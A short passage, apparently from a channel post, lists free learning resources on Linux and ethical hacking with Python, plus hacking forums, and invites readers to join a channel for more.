- Ultimate Linux Free Book
- Python for Ethical Hacking
4. Ethical Hacking Forums
Join @free4unow_backup for more free resources
ENJOY LEARNING 👨💻🔒
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